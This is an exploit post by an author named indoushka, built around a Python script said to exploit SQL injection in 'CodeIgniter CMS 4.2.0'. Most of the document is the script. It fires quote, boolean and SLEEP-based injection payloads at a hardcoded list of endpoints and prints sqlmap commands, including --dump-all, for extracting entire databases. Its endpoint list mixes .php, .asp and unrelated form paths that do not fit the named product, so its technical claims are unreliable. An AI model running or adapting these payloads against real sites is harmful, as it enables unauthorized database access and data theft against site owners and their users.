============================================================================================================================================= | # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.codeigniter.com/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/167893/ [+] Summary : multiple SQL Injection vulnerabilities in CodeIgniter CMS version 4.2.0. The vulnerabilities affect various endpoints and parameters, allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database. Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests. [+] POC : python poc.py #!/usr/bin/env python3 """ CodeIgniter CMS Version 4.2.0 SQL Injection Exploit Author: indoushka Vulnerability: SQL Injection in multiple parameters """ import requests import sys import urllib3 import time from argparse import ArgumentParser # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class CodeIgniterExploit: def __init__(self, target): self.target = target.rstrip('/') self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive' }) def check_vulnerability(self): """Check if target is vulnerable to SQL Injection""" print(f"[*] Checking vulnerability for: {self.target}") # Test multiple vulnerable endpoints endpoints = [ "/Job/searchResult/?title=123", "/Job/searchResult/?title=test", "/search.php?search=1", "/news.php?p=7251", "/employe/show.php?cvid=14088", "/login/", "/fa/index.asp?p=search&search=1", "/fa/FormView/1026", "/fa/formview/1030" ] vulnerable_endpoints = [] for endpoint in endpoints: # Test with single quote test_url = f"{self.target}{endpoint}'" try: response = self.session.get(test_url, timeout=10, verify=False) # Check for SQL error indicators error_indicators = [ "SQL syntax", "mysql_fetch", "mysql_num_rows", "ODBC Driver", "Unclosed quotation mark", "syntax error", "MySQL server", "Warning: mysql", "PostgreSQL", "ORA-", "Microsoft OLE DB" ] for error in error_indicators: if error.lower() in response.text.lower(): print(f"[+] SQL Injection found in: {endpoint}") vulnerable_endpoints.append(endpoint) break except Exception as e: print(f"[-] Error testing {endpoint}: {e}") continue return vulnerable_endpoints def exploit_boolean(self, endpoint): """Boolean-based blind SQL injection""" print(f"[*] Testing boolean-based SQLi on: {endpoint}") # Test boolean conditions true_payload = f"{endpoint}' AND '1'='1" false_payload = f"{endpoint}' AND '1'='2" try: true_response = self.session.get(f"{self.target}{true_payload}", timeout=10, verify=False) false_response = self.session.get(f"{self.target}{false_payload}", timeout=10, verify=False) if true_response.text != false_response.text: print("[+] Boolean-based SQL Injection confirmed!") return True except Exception as e: print(f"[-] Boolean test failed: {e}") return False def exploit_time_based(self, endpoint): """Time-based blind SQL injection""" print(f"[*] Testing time-based SQLi on: {endpoint}") time_payload = f"{endpoint}' AND SLEEP(5)--" try: start_time = time.time() response = self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False) end_time = time.time() if end_time - start_time >= 5: print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)") return True except Exception as e: print(f"[-] Time-based test failed: {e}") return False def generate_sqlmap_commands(self, endpoints): """Generate sqlmap commands for automated exploitation""" print("\n[+] SQLMap Commands:") print("=" * 60) for endpoint in endpoints: url = f"{self.target}{endpoint}" print(f"\n# For endpoint: {endpoint}") print(f'sqlmap -u "{url}" --batch --level=5 --risk=3') print(f'sqlmap -u "{url}" --batch --dbs') print(f'sqlmap -u "{url}" --batch --current-db') print(f'sqlmap -u "{url}" --batch --tables') print(f'sqlmap -u "{url}" --batch --dump-all') def comprehensive_scan(self): """Run comprehensive vulnerability scan""" print("[*] Starting comprehensive CodeIgniter CMS scan...") # Check vulnerability vulnerable_endpoints = self.check_vulnerability() if not vulnerable_endpoints: print("[-] No SQL Injection vulnerabilities found") return print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints") # Test exploitation methods on each endpoint for endpoint in vulnerable_endpoints: print(f"\n[*] Testing exploitation methods for: {endpoint}") # Boolean-based self.exploit_boolean(endpoint) # Time-based self.exploit_time_based(endpoint) # Generate sqlmap commands self.generate_sqlmap_commands(vulnerable_endpoints) def main(): banner = """ ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗ ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗ ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║ ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║ ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ CodeIgniter CMS 4.2.0 SQL Injection Exploit By: indoushka """ print(banner) parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit') parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)') parser.add_argument('--check', action='store_true', help='Check vulnerability only') parser.add_argument('--exploit', action='store_true', help='Run full exploitation') parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands') args = parser.parse_args() exploit = CodeIgniterExploit(args.url) if args.check: vulnerable_endpoints = exploit.check_vulnerability() if vulnerable_endpoints: print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints") else: print("\n[!] Target does not appear to be vulnerable") elif args.exploit: exploit.comprehensive_scan() elif args.sqlmap: vulnerable_endpoints = exploit.check_vulnerability() if vulnerable_endpoints: exploit.generate_sqlmap_commands(vulnerable_endpoints) else: print("[-] No vulnerable endpoints found for sqlmap") else: # Default: comprehensive scan exploit.comprehensive_scan() if __name__ == "__main__": if len(sys.argv) == 1: print("Usage: python codeigniter_exploit.py -u https://target.com") print("Options: --check, --exploit, --sqlmap") sys.exit(1) main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================